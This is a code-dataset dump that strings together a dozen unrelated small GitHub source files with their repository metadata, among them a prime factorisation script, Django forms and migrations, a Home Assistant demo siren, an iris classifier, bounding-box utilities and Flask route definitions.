pass
desktopFile.writelines(suffix)
os.environ['LANGUAGE'] = "en_US.UTF-8"
gettext.install(domain, path) | UTF-8 | Python | false | false | 4,155 | py | 18 | additionalfiles.py | 16 | 0.557882 | 0.556679 | 0 | 106 | 38.207547 | 115 |
rogersilveiraa/Python | 858,993,490,805 | 874ca1d689b286a78adcbea2af848e5ddc838402 | fcfc0f847a898125a32ebeeaf8e4bad891b4b67f | /Semana 7/Decomposição em primos.py | e7d303f4ada5fa48be63a8a6406746eb4c40c828 | [] | no_license | https://github.com/rogersilveiraa/Python | 61db5950ec15611b5d321a8b6c04b25a0f6b96ca | 80e2d6482c401f256a9ccc37a14ca913b8965d20 | refs/heads/master | "2021-08-18T08:35:28.750946" | "2021-04-27T14:04:01" | "2021-04-27T14:04:01" | 250,093,498 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | entrada_usuario = 1
fator = 2
while entrada_usuario < 2:
entrada_usuario = int(input("Digite um número natural maior que 1 para saber sua fatoração: \n"))
while entrada_usuario != 1 :
expoente = 0
while (entrada_usuario % fator) == 0:
entrada_usuario /= fator
expoente += 1
if expoente != 0 and entrada_usuario != 1:
print (fator, "^" ,expoente, end = " * ")
if entrada_usuario == 1:
print (fator, "^", expoente)
fator += 1
| UTF-8 | Python | false | false | 511 | py | 30 | Decomposição em primos.py | 30 | 0.566929 | 0.543307 | 0 | 19 | 24.947368 | 101 |
petemulholland/learning | 6,124,623,391,290 | 112f405af7a6e4465ea54408f534eac8940593e4 | 82ffe7f53d2275e7baf858a0eebf69c42e4b1f8a | /Python/ThinkPython/Chapter11/homophones.py | 3a1715451ff00c597070976a76328c55186e3c8e | [] | no_license | https://github.com/petemulholland/learning | 325bf39cf2499880e471a99389e1fa0dada27bbf | f51185262b5ffbda4437324c6be52569d443d5b4 | refs/heads/master | "2020-04-10T22:48:33.418638" | "2017-08-26T13:45:31" | "2017-08-26T13:45:31" | 10,203,967 | 0 | 0 | null | false | "2017-02-28T10:41:59" | "2013-05-21T19:45:14" | "2016-02-23T16:09:11" | "2017-02-28T10:41:59" | 9,700 | 0 | 0 | 0 | C# | null | null | import pronounce
def read_words():
"""Read the words in words.txt and return a dictionary
that contains the words as keys"""
words = []
fin = open('..\words.txt')
for line in fin:
word = line.strip().lower()
words.append(word)
return words
def check_homophones(word, pron):
if len(word) < 4:
return
if word not in pron:
return
wpron = pron[word]
hom1 = word[1:]
if hom1 not in pron:
return
h1pron = pron[hom1]
hom2 = word[0] + word[2:]
if hom2 not in pron:
return
h2pron = pron[hom2]
if wpron == h1pron and wpron == h2pron:
print word, hom1, hom2
def main():
words = read_words()
pron = pronounce.read_dictionary()
for word in words:
check_homophones(word, pron)
if __name__ == '__main__':
main() | UTF-8 | Python | false | false | 894 | py | 259 | homophones.py | 173 | 0.540268 | 0.522371 | 0 | 44 | 18.363636 | 58 |
chfoued/django | 2,748,779,106,578 | e8e500dd136b0d5c2c26fadad3e38df30cfae8da | 978b097f216fc1af3e6f5afc399102e393fde167 | /polls/forms.py | a1fd365cad21d7190fa653ac3ac7f103472214ec | [] | no_license | https://github.com/chfoued/django | afeb2ac96e583999b9a491304310080a217cba74 | 0935341ce3d9bddc8de7aadd77a9898a0d4d0021 | refs/heads/master | "2021-09-01T10:37:30.378477" | "2017-12-12T15:47:46" | "2017-12-12T15:47:46" | 112,955,333 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django import forms
from .models import Produit
class ProduitForm(forms.Form):
name = forms.CharField(max_length=200)
Poids = forms.FloatField()
nbr_carton = forms.IntegerField()
class OperationForm(forms.Form):
produit = forms.ModelChoiceField(queryset=Produit.objects.all())
poids = forms.FloatField()
nbr_carton = forms.IntegerField()
client = forms.CharField(max_length=200)
date = forms.DateField()
| UTF-8 | Python | false | false | 428 | py | 7 | forms.py | 4 | 0.75 | 0.735981 | 0 | 15 | 27 | 65 |
rottaca/VPlotter2.0 | 17,119,739,641,949 | ee07b8b4dc54e5e9d9d649a81699813811a0a45c | 2d18f6457e9a166035e6420869540bf679ecdd55 | /plotter/utils/calibration.py | ef51ae251650494d52726750e1d09121f81c493a | [] | no_license | https://github.com/rottaca/VPlotter2.0 | bb452aa870f1c8ef2f1586193d96e56a0063a92b | 57918dad191f8f0a23b9b561d252edf20eecf057 | refs/heads/master | "2020-03-19T16:22:26.165890" | "2019-06-22T17:51:37" | "2019-06-22T17:51:37" | 136,713,012 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
class Calibration:
"""
Calibration class for plotter.
All (x,y) coordinates have to be relative to the origin.
Absolute zero is at the upper left corner (left motor).
"""
def __init__(self, base, origin, stepsPerMM, resolution):
self.base = base
self.origin = origin
self.stepsPerMM = stepsPerMM
self.resolution = resolution
def __str__(self):
return """----------Calibration----------
Base: {}
Origin: {}
-------------------------------""".format(str(self.base), str(self.origin))
| UTF-8 | Python | false | false | 573 | py | 21 | calibration.py | 17 | 0.570681 | 0.570681 | 0 | 21 | 26.285714 | 75 |
jodhiambo/beelinev1 | 2,508,260,906,374 | 15fc62aeb17a6a0ee45f6ab36be7333e7842fe70 | 0a8bb114534eabdcf8d9a1d43462e374183cf6e7 | /userprofiles/migrations/0003_auto_20200806_2051.py | dc3768aa2c675e0eead9aa7b3adaa1de610afc23 | [] | no_license | https://github.com/jodhiambo/beelinev1 | 70a465ddf6e1f89493af07122496fd503d4d5d86 | d8af31cf1090c58fe52d6bec0f82ac49e69260df | refs/heads/main | "2023-06-23T09:05:47.386524" | "2021-07-21T12:51:00" | "2021-07-21T12:51:00" | 388,112,973 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 3.0.8 on 2020-08-06 17:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('userprofiles', '0002_auto_20200806_2041'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='age_group',
field=models.CharField(blank=True, choices=[('Below 18 Yrs', 'Below 18 Yrs'), ('18-35 Yrs', '18-35 Yrs'), ('Above 35 Yrs', 'Above 35 Yrs')], default='', max_length=50, null=True),
),
]
| UTF-8 | Python | false | false | 536 | py | 69 | 0003_auto_20200806_2051.py | 27 | 0.595149 | 0.503731 | 0 | 18 | 28.777778 | 191 |
NickAlger/helper_functions | 7,456,063,228,282 | b0386ded0f41eca9880cf0e4ba62947b471ef70a | 79c3df91736d433118557f69626ea1d313be06dc | /nalger_helper_functions/box_mesh_nd.py | 31d3a55fe940dcbec727ea0d2e44181d029399fb | [] | no_license | https://github.com/NickAlger/helper_functions | 221245324f01d7ef3e5b8b9dc134036d829fa2ae | ef51c1aecb010b169caeb9cd0efa20d9160c80fa | refs/heads/master | "2021-06-24T08:49:30.858690" | "2021-06-10T09:46:13" | "2021-06-10T09:46:13" | 212,186,032 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import dolfin as dl
def box_mesh_nd(box_min, box_max, grid_shape):
# Usage:
# https://github.com/NickAlger/nalger_helper_functions/blob/master/jupyter_notebooks/box_mesh_nd.ipynb
d = len(box_min)
if d == 1:
mesh = dl.IntervalMesh(grid_shape[0] - 1, box_min[0], box_max[0])
elif d == 2:
mesh = dl.RectangleMesh(dl.Point(box_min), dl.Point(box_max), grid_shape[0] - 1, grid_shape[1] - 1)
elif d == 3:
mesh = dl.BoxMesh(dl.Point(box_min), dl.Point(box_max), grid_shape[0] - 1, grid_shape[1] - 1, grid_shape[2] - 1)
else:
raise RuntimeError('grid_mesh only supports d=1,2,3')
return mesh | UTF-8 | Python | false | false | 670 | py | 114 | box_mesh_nd.py | 53 | 0.620896 | 0.591045 | 0 | 17 | 38.470588 | 120 |
home-assistant/core | 2,027,224,589,347 | 3ab286c2c36087656bd73278d9a91e5a49841f99 | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /homeassistant/components/demo/siren.py | 0720114861cfe373a438891105b0d52779901bf6 | [
"Apache-2.0"
] | permissive | https://github.com/home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | "2023-08-31T15:41:06.299469" | "2023-08-31T14:50:53" | "2023-08-31T14:50:53" | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | false | "2023-09-14T21:50:15" | "2013-09-17T07:29:48" | "2023-09-14T21:50:03" | "2023-09-14T21:50:15" | 470,852 | 62,888 | 24,675 | 2,641 | Python | false | false | """Demo platform that offers a fake siren device."""
from __future__ import annotations
from typing import Any
from homeassistant.components.siren import SirenEntity, SirenEntityFeature
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
SUPPORT_FLAGS = SirenEntityFeature.TURN_OFF | SirenEntityFeature.TURN_ON
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the Demo siren devices."""
async_add_entities(
[
DemoSiren(name="Siren"),
DemoSiren(
name="Siren with all features",
available_tones=["fire", "alarm"],
support_volume_set=True,
support_duration=True,
),
]
)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the Demo siren devices config entry."""
await async_setup_platform(hass, {}, async_add_entities)
class DemoSiren(SirenEntity):
"""Representation of a demo siren device."""
def __init__(
self,
name: str,
available_tones: list[str | int] | None = None,
support_volume_set: bool = False,
support_duration: bool = False,
is_on: bool = True,
) -> None:
"""Initialize the siren device."""
self._attr_name = name
self._attr_should_poll = False
self._attr_supported_features = SUPPORT_FLAGS
self._attr_is_on = is_on
if available_tones is not None:
self._attr_supported_features |= SirenEntityFeature.TONES
if support_volume_set:
self._attr_supported_features |= SirenEntityFeature.VOLUME_SET
if support_duration:
self._attr_supported_features |= SirenEntityFeature.DURATION
self._attr_available_tones = available_tones
async def async_turn_on(self, **kwargs: Any) -> None:
"""Turn the siren on."""
self._attr_is_on = True
self.async_write_ha_state()
async def async_turn_off(self, **kwargs: Any) -> None:
"""Turn the siren off."""
self._attr_is_on = False
self.async_write_ha_state()
| UTF-8 | Python | false | false | 2,504 | py | 11,073 | siren.py | 9,921 | 0.640974 | 0.640974 | 0 | 76 | 31.947368 | 74 |
victorfbrito/pythonbasics | 3,779,571,250,017 | f6f6cc37173102c47bce9daee5646c24347279b7 | d60ea46b094b5758a9050697916d3b90891619e9 | /Calculadora.py | 0d35da0075b9d1051bf355645dc0077ad8966c1f | [] | no_license | https://github.com/victorfbrito/pythonbasics | 17943dce426bfe8afdca7bf9ede6e7c13602f7da | 42ea2dcba83ab93a0aeed6dca3b53155584a2f7e | refs/heads/master | "2022-12-12T03:54:14.488214" | "2020-08-26T14:10:31" | "2020-08-26T14:10:31" | 290,514,281 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Criando uma classe/ Subtipo de OBJECT: HERDA TODAS AS CARACTERÍSTICAS DE OBJECT
class Calculadora(object):
def __init__(self,a,b):
self.a = a
self.b = b
def definevalores(self,a,b):
self.a = a
self.b = b
def soma(self):
return self.a + self.b;
| UTF-8 | Python | false | false | 305 | py | 11 | Calculadora.py | 10 | 0.572368 | 0.572368 | 0 | 15 | 19.2 | 81 |
JovanDel/August | 128,849,053,028 | 2a278683f487635558c462709ee3f869bd5e0722 | 96543443202bb30332f97007d8d0a027356b813d | /myfile.py | 6c1056aa9219e651a23df08d89464831838e3848 | [] | no_license | https://github.com/JovanDel/August | 4451a7bbb7d67f365eb26bce06d39c57d81a1ffd | 0f65f21c23e8e7e597b5406074652b9117264630 | refs/heads/master | "2022-12-10T02:40:06.973909" | "2020-09-02T07:47:23" | "2020-09-02T07:47:23" | 292,213,881 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | text_file = open("family.txt", "w")
n = text_file.write('Welcome to pythonexamples.org')
text_file.close()
myFile.write("Mark
| UTF-8 | Python | false | false | 130 | py | 43 | myfile.py | 23 | 0.692308 | 0.692308 | 0 | 4 | 30.5 | 52 |
AchillesJJ/RL_spin1 | 3,204,045,634,185 | 6602b73dabc3446ffb8619cb405dc9ef07544223 | 053ff1d3f7c92162536602a3d5a260800c7b0404 | /DDPG_python3/spin1_ED.py | 08c5c0b04fa8768e34fb8a68eb445993bdce7410 | [] | no_license | https://github.com/AchillesJJ/RL_spin1 | 56ce9874810029fc648b3f41bf6d5377d50326b7 | 548c892a0b8d4471e97a4e5fefff29672ccd3b3c | refs/heads/master | "2021-09-19T07:28:33.892172" | "2018-07-25T03:20:58" | "2018-07-25T03:20:58" | 111,948,400 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # encoding: utf-8
import time
import os
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
from scipy import linalg
from scipy.integrate import odeint
from scipy.integrate import ode
import math
import cPickle
import cmath
# Hamiltonian of spin-1 system
def Hamiltonian(q, c2, Nt):
"""
This functions generate the Hamiltonian of spin-1 system
q: quadratic Zeeman shift
c2: interaction strength of spin exchange
Nt: total partical number
"""
dim = int(Nt/2)+1
Htot = np.zeros((dim, dim), dtype = np.float64)
# diagonal part
for m in range(dim):
Htot[m, m] = (c2/(2.0*Nt))*(2.0*(Nt-2.0*m)-1)*(2.0*m)-q*(Nt-2.0*m)
# spin-exchange part
for m in range(dim-1):
Htot[m, m+1] = (c2/Nt)*(m+1)*math.sqrt(Nt-2*m-1)*math.sqrt(Nt-2*m)
Htot[m+1, m] = Htot[m, m+1]
return Htot
# normalization of wave function
def normalize(psi):
norm = math.sqrt(np.sum(abs(psi)**2))
return psi/norm
# one-step time evolution matrix
def unitary_op(q, c2, Nt, dt, psi):
"""
This function generate the evolution matrix with
q: quadratic Zeeman shift
c2: interaction strength of spin exchange
Nt: total partical number
dt: evolution time interval
"""
H = Hamiltonian(q[0][0], c2, Nt)
op = sp.linalg.expm2(-complex(0.0, 1.0)*dt*H)
psi_f = op.dot(psi)
return normalize(psi_f)
# if __name__ == '__main__':
# psi = np.zeros((2,), dtype=np.complex64)
# psi[0] = 1.0
# psi2 = unitary_op([[-0.25]], -1.0, 2, 0.5, psi)
# print(abs(psi2[-1])**2, util.state(psi2))
| UTF-8 | Python | false | false | 1,624 | py | 22 | spin1_ED.py | 10 | 0.614532 | 0.577586 | 0 | 58 | 26.482759 | 74 |
EthanJamesLew/PSU_STAT671 | 13,030,930,778,016 | 34b1553a8b0e5edd67fc50293f7d073e81714b9d | 636359cf640b72d8086a08454ef2343cdf9e5b0b | /hw/01/simple_classifier/iris.py | 4563640da1b4b906ff0598beb847c982bb70ff0c | [] | no_license | https://github.com/EthanJamesLew/PSU_STAT671 | 679e05a0b98dd7eecab14d2791b0d678f722f7c5 | b378ed71be3db5d7d24f6f583ec9e4633048f718 | refs/heads/master | "2020-08-04T18:33:00.241658" | "2019-12-12T01:26:16" | "2019-12-12T01:26:16" | 212,237,716 | 0 | 0 | null | false | "2019-12-12T01:26:17" | "2019-10-02T02:10:37" | "2019-12-05T07:13:22" | "2019-12-12T01:26:17" | 3,707 | 0 | 0 | 0 | Jupyter Notebook | false | false | '''Iris
@author: Ethan Lew
'''
from sklearn.datasets import load_iris
import pandas as pd
import numpy as np
from classifier import PartitionData, SimpleClassifier, risk
def load_iris_data(s0, s1, ratio):
# Get Iris Data
iris_sk = load_iris()
species_lp = {'I. setosa': 0, 'I. versicolor': 1, 'I. virginica': 2}
iris_df = {'sepal_length': iris_sk['data'][:, 0], 'sepal_width': iris_sk['data'][:, 1],
'petal_length': iris_sk['data'][:, 2],
'petal_width': iris_sk['data'][:, 3], 'species': iris_sk['target']}
iris_df = pd.DataFrame(data=iris_df)
iris_df = iris_df.loc[(iris_df['species'] == species_lp[s0]) | (iris_df['species'] == species_lp[s1])]
# Load as R^4 observations and map labels to binary values
X = np.array(iris_df)[:, :-1]
Y = np.array(iris_df)[:, -1]
unique = set(np.array(Y, dtype=np.int))
Y[Y == min(unique)] = -1
Y[Y == max(unique)] = 1
# Partition the data
iris_data = PartitionData()
iris_data.add_data(X, Y)
iris_data.partition(ratio)
# Return data object and map to species name
indices_lp = {species_lp[k] : k for k in species_lp}
return iris_data, {1: indices_lp[max(unique)], -1: indices_lp[min(unique)]}
def classify_species(s0, s1, ratio):
sc = SimpleClassifier()
iris, names = load_iris_data(s0, s1, ratio)
sc.add_data(*iris.training)
sc.train()
valr = np.array([sc.classify(x) for x in iris.training[0]])
val = np.array([sc.classify(x) for x in iris.validation[0]])
return risk(valr, iris.training[1]), risk(val, iris.validation[1])
def problem_1():
risk1, error1 = classify_species('I. setosa', 'I. versicolor', 0.8)
risk2, error2 = classify_species('I. virginica', 'I. versicolor', 0.8)
risk3, error3 = classify_species('I. virginica', 'I. setosa', 0.8)
print('Empirical Risk of I. Setosa, I. Versicolor: ', risk1)
print('Empirical Risk of I. Virginica, I. Versicolor: ', risk2)
print('Empirical Risk of I. Virginica, I. Setosa: ', risk3)
print('Classification Error of I. Setosa and I. Versicolor: ', error1)
print('Classification Error of I. Virginica and I. Versicolor: ', error2)
print('Classification Error of I. Virginica and I. Setosa: ', error3)
def scatter():
import matplotlib.pyplot as plt
import matplotlib.font_manager
from mpl_toolkits.mplot3d import Axes3D
from sklearn import datasets
from sklearn.decomposition import PCA
from matplotlib import rc
rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']})
rc('text', usetex=True)
iris = datasets.load_iris()
X = iris.data[:, :2] # we only take the first two features.
y = iris.target
x_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5
y_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5
plt.figure(2, figsize=(8 / 1.5, 6 / 1.5))
plt.clf()
# Plot the training points
plt.scatter(X[y == 0, 0], X[y == 0, 1], c='r', cmap=plt.cm.Set1,
edgecolor='k')
plt.scatter(X[y == 1, 0], X[y == 1, 1], c='g', cmap=plt.cm.Set1,
edgecolor='k')
plt.scatter(X[y == 2, 0], X[y == 2, 1], c='b', cmap=plt.cm.Set1,
edgecolor='k')
plt.xlabel('Sepal Length (cm)')
plt.ylabel('Sepal Width (cm)')
plt.legend(["I. Setosa", "I. Versicolor", "I. Virginica"])
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xticks(())
plt.yticks(())
fig = plt.figure(1, figsize=(8, 6))
ax = Axes3D(fig, elev=-150, azim=110)
X_reduced = PCA(n_components=3).fit_transform(iris.data)
ax.scatter(X_reduced[:, 0], X_reduced[:, 1], X_reduced[:, 2], c=y,
cmap=plt.cm.Set1, edgecolor='k', s=40)
ax.set_title("First three PCA directions")
ax.set_xlabel("1st eigenvector")
ax.w_xaxis.set_ticklabels([])
ax.set_ylabel("2nd eigenvector")
ax.w_yaxis.set_ticklabels([])
ax.set_zlabel("3rd eigenvector")
ax.w_zaxis.set_ticklabels([])
plt.show()
if __name__ == "__main__":
problem_1() | UTF-8 | Python | false | false | 4,044 | py | 38 | iris.py | 17 | 0.600396 | 0.575915 | 0 | 111 | 35.441441 | 106 |
HeDefine/LeetCodePractice | 10,617,159,192,799 | 2318d9060b710e6c1c532549d12ecc8569a4446e | 5855918d1e253b8cdbabbf80137d06d2750963b0 | /Q1252.奇数值单元格的数目.py | 42db16acd6097c0b4572569d1627f3a9537fa10e | [] | no_license | https://github.com/HeDefine/LeetCodePractice | f6b163984e83370e44febae93b0a9cf34813a331 | 331c562d6618b5a95a17c4ae108f0e0442bd0dd6 | refs/heads/master | "2022-09-22T14:57:21.499849" | "2022-09-20T06:46:22" | "2022-09-20T06:46:22" | 195,788,878 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # 给你一个 m x n 的矩阵,最开始的时候,每个单元格中的值都是 0。
# 另有一个二维索引数组 indices,indices[i] = [ri, ci] 指向矩阵中的某个位置,其中 ri 和 ci 分别表示指定的行和列(从 0 开始编号)。
# 对 indices[i] 所指向的每个位置,应同时执行下述增量操作:
# ri 行上的所有单元格,加 1 。
# ci 列上的所有单元格,加 1 。
# 给你 m、n 和 indices 。请你在执行完所有 indices 指定的增量操作后,返回矩阵中 奇数值单元格 的数目。
#
# 示例 1:
# 输入:m = 2, n = 3, indices = [[0,1],[1,1]]
# 输出:6
# 解释:最开始的矩阵是 [[0,0,0],[0,0,0]]。
# 第一次增量操作后得到 [[1,2,1],[0,1,0]]。
# 最后的矩阵是 [[1,3,1],[1,3,1]],里面有 6 个奇数。
#
# 示例 2:
# 输入:m = 2, n = 2, indices = [[1,1],[0,0]]
# 输出:0
# 解释:最后的矩阵是 [[2,2],[2,2]],里面没有奇数。
#
# 提示:
# 1 <= m, n <= 50
# 1 <= indices.length <= 100
# 0 <= ri < m
# 0 <= ci < n
class Solution:
def oddCells(self, m: int, n: int, indices: list) -> int:
row_list = [0] * m
col_list = [0] * n
for pos in indices:
x, y = pos[0], pos[1]
row_list[x] += 1
col_list[y] += 1
res = 0
for row in row_list:
for col in col_list:
if (row + col) % 2 == 1:
res += 1
return res
print (Solution().oddCells(2, 3, [[0,1],[1,1]])) # 6
print(Solution().oddCells(2, 2, [[1,1],[0,0]])) # 0 | UTF-8 | Python | false | false | 1,602 | py | 581 | Q1252.奇数值单元格的数目.py | 579 | 0.48738 | 0.421236 | 0 | 42 | 26.380952 | 86 |
LCOGT/banzai-nres | 12,180,527,279,666 | edee1001f1e1893333dded7351b499f7c033641a | 68b53b55647fa64d4a74230a2bcf8025f1839a6f | /banzai_nres/tests/test_gc_distance.py | 624430d98b5f5003e2b5d90cfb767f5adc88ecfd | [] | no_license | https://github.com/LCOGT/banzai-nres | 04e75ae1c3c2bb86d0173a5ffe47462ef444ede6 | 5533ad0f60b96111aceec7b1661d260692f6f43d | refs/heads/main | "2023-08-30T22:36:07.639127" | "2023-07-25T20:31:02" | "2023-07-25T20:31:02" | 140,865,515 | 2 | 2 | null | false | "2023-08-23T16:12:48" | "2018-07-13T15:44:06" | "2022-12-08T01:05:32" | "2023-08-23T16:12:48" | 21,576 | 3 | 1 | 9 | Python | false | false | from banzai_nres.dbs import cos_great_circle_distance
from astropy.coordinates import SkyCoord
from astropy import units
import numpy as np
def test_gc_distance():
ra1, dec1 = 150.0, 25.0
ra2, dec2 = 100.0, 10.0
coord1 = SkyCoord(ra1, dec1, unit=(units.deg, units.deg))
coord2 = SkyCoord(ra2, dec2, unit=(units.deg, units.deg))
expected = np.cos(np.deg2rad(coord1.separation(coord2).deg))
actual = cos_great_circle_distance(np.sin(np.deg2rad(ra1)), np.cos(np.deg2rad(ra1)),
np.sin(np.deg2rad(dec1)), np.cos(np.deg2rad(dec1)),
np.sin(np.deg2rad(ra2)), np.cos(np.deg2rad(ra2)),
np.sin(np.deg2rad(dec2)), np.cos(np.deg2rad(dec2)))
np.testing.assert_allclose(actual, expected)
| UTF-8 | Python | false | false | 821 | py | 77 | test_gc_distance.py | 50 | 0.605359 | 0.552984 | 0 | 18 | 44.611111 | 90 |
veronM/svgis | 6,004,364,330,207 | fe32b5a36e82db405653bd123dcfbbf03dd67370 | 656345432c7f242da3e259f9e47b7810317a99bd | /src/svgis/bounding.py | ff56082500abd8c031bb599593ff6a548ac7c5ed | [] | no_license | https://github.com/veronM/svgis | 3faa49ab188642bdb18b5413db9d6176e0ff706c | 1b3fb8617a0c124c393de5df9a6e1f3f060ccc91 | refs/heads/master | "2022-12-25T08:54:44.192586" | "2020-10-04T18:41:23" | "2020-10-04T18:41:23" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''Utilities for working with bounding boxes'''
# This file is part of svgis.
# https://github.com/fitnr/svgis
# Licensed under the GNU General Public License v3 (GPLv3) license:
# http://opensource.org/licenses/GPL-3.0
# Copyright (c) 2015-16, 2020, Neil Freeman <contact@fakeisthenewreal.org>
from pyproj.transformer import Transformer
from . import errors, utils
def check(bounds):
'''Check if bounds are valid.'''
# Refuse to set these more than once
try:
if bounds is None or len(bounds) != 4 or not all(bounds):
return False
except (TypeError, AttributeError, ValueError):
return False
if bounds[0] > bounds[2]:
bounds = bounds[2], bounds[1], bounds[0], bounds[3]
if bounds[1] > bounds[3]:
bounds = bounds[0], bounds[3], bounds[2], bounds[1]
return bounds
def update(old, new):
"""
Extend old with any more distant values from newpoints.
Also replace any missing min/max points in old with values from new.
"""
bounds = []
inf = float('inf')
neginf = inf * -1
# python3 gives TypeError when using None in min/max
# This contraption avoids that problem.
# List comp below replaces Nones in bounds with real values in new or old
for n, m in zip(new[:2], old[:2]):
try:
if neginf in (m, n):
bounds.append(max(n, m))
continue
bounds.append(min(n, m))
except TypeError:
bounds.append(None)
for n, m in zip(new[2:], old[2:]):
try:
if inf in (m, n):
bounds.append(min(n, m))
continue
bounds.append(max(n, m))
except TypeError:
bounds.append(None)
if any(not v for v in bounds):
bounds = list((a or b or c) for a, b, c in zip(bounds, new, old))
return bounds
def pad(bounds, ext=100):
"""
Pad a bounding box. Works best when input is in feet or meters or something.
"""
try:
return bounds[0] - ext, bounds[1] - ext, bounds[2] + ext, bounds[3] + ext
except TypeError:
return bounds
def ring(bounds):
'''Convert min, max points to a boundary ring.'''
minx, miny, maxx, maxy = bounds
xs, ys = list(utils.between(minx, maxx)), list(utils.between(miny, maxy))
left_top = [(minx, y) for y in ys] + [(x, maxy) for x in xs][1:]
ys.reverse()
xs.reverse()
return left_top + [(maxx, y) for y in ys] + [(x, miny) for x in xs]
def covers(b1, b2):
"""
Check if a bounding box covers another. Returns ``False`` if any
points in ``b2`` are outside ``b1`.
Args:
b1 (tuple): A bounding box (minx, miny, maxx, maxy)
b2 (tuple): A bounding box
Returns:
``bool``
"""
return b1[0] <= b2[0] and b1[1] <= b2[1] and b1[2] >= b2[2] and b1[3] >= b2[3]
def transform(bounds, **kwargs):
"""
Project a bounding box, taking care to not slice off the sides.
Args:
bounds (tuple): bounding box to transform.
transformer (pyproj.transformer.Transformer): A pyproj Transformer instance.
in_crs (dict): Fiona-type proj4 mapping representing input projection.
out_crs (dict): Fiona-type proj4 mapping representing output projection.
Returns:
``tuple``
"""
transformer = kwargs.get('transformer')
in_crs = kwargs.get('in_crs')
out_crs = kwargs.get('out_crs')
if not transformer and not (in_crs and out_crs):
raise errors.SvgisError('Need input CRS and output CRS or a Transformer')
if transformer is None:
transformer = Transformer.from_crs(in_crs, out_crs, skip_equivalent=True, always_xy=True)
densebounds = ring(bounds)
xbounds, ybounds = list(zip(*transformer.itransform(densebounds)))
return min(xbounds), min(ybounds), max(xbounds), max(ybounds)
| UTF-8 | Python | false | false | 3,921 | py | 36 | bounding.py | 29 | 0.606478 | 0.589645 | 0 | 136 | 27.830882 | 97 |
zwerg44/python-engineio | 12,610,023,988,742 | 99aaf9098e8ff089bbc0bc273ded3cfd10d95fd8 | 54d2b57e4946f8854814994db2eea2add72bc1f4 | /engineio/__init__.py | a28690acaac1ef19c0e19ef702be3efb2ec20649 | [
"MIT"
] | permissive | https://github.com/zwerg44/python-engineio | 8f495e0d312b528f81e198b69c154413f794b762 | 849a5578998f8e04750bd4796f605f460fe95059 | refs/heads/master | "2020-04-08T16:22:08.976059" | "2018-12-02T22:48:28" | "2018-12-02T22:48:28" | 159,515,374 | 0 | 0 | null | true | "2018-11-28T14:33:46" | "2018-11-28T14:33:45" | "2018-11-25T11:37:07" | "2018-11-25T15:24:39" | 532 | 0 | 0 | 0 | null | false | null | import sys
from .middleware import WSGIApp, Middleware
from .server import Server
if sys.version_info >= (3, 5): # pragma: no cover
from .asyncio_server import AsyncServer
from .async_tornado import get_tornado_handler
from .async_asgi import ASGIApp
else: # pragma: no cover
AsyncServer = None
__version__ = '2.3.2'
__all__ = ['__version__', 'Server', 'WSGIApp', 'Middleware']
if AsyncServer is not None: # pragma: no cover
__all__ += ['AsyncServer', 'ASGIApp', 'get_tornado_handler']
| UTF-8 | Python | false | false | 512 | py | 4 | __init__.py | 3 | 0.675781 | 0.666016 | 0 | 16 | 31 | 64 |
nehuenpereyra/Sistema-Gestion-Centros-de-Ayuda-y-Turnos | 8,907,762,215,369 | d797efd545aca41b9fee5bd1ee9d15c887afbba0 | cf4e542356c0739c49b16c31260228622f433359 | /config/routes/help_center.py | a38b28ed4fef8823022698e7bd98fe75a339ec79 | [] | no_license | https://github.com/nehuenpereyra/Sistema-Gestion-Centros-de-Ayuda-y-Turnos | cb3d2b27c10840726fbd39aedcc77ab10018bf32 | 1295d498498743afe45e814955d478e3b54c47dc | refs/heads/main | "2023-08-05T18:40:57.916437" | "2021-09-17T11:45:32" | "2021-09-17T11:45:32" | 407,519,229 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from app.resources import help_center
import app.resources.api.help_center as api_help_center
def set_routes(app):
app.add_url_rule("/centros", "help_center_index", help_center.index)
app.add_url_rule("/centro/ver/<int:id>",
"help_center_show", help_center.show)
app.add_url_rule("/centro/nuevo", "help_center_new", help_center.new)
app.add_url_rule("/centro/crear", "help_center_create",
help_center.create, methods=["POST"])
app.add_url_rule("/centro/editar/<int:id>",
"help_center_edit", help_center.edit)
app.add_url_rule("/centro/actualizar/<int:id>",
"help_center_update", help_center.update, methods=["POST"])
app.add_url_rule("/centro/borrar/<int:id>",
"help_center_delete", help_center.delete)
app.add_url_rule("/centro/aceptar/<int:id>",
"help_center_accept", help_center.certify, defaults={"is_accepted": True})
app.add_url_rule("/centro/rechazar/<int:id>",
"help_center_reject", help_center.certify, defaults={"is_accepted": False})
app.add_url_rule("/api/centros", "api_help_center_index",
api_help_center.index)
app.add_url_rule("/api/centro/<int:id>",
"api_help_center_show", api_help_center.show)
app.add_url_rule("/api/centro", "api_help_center_create",
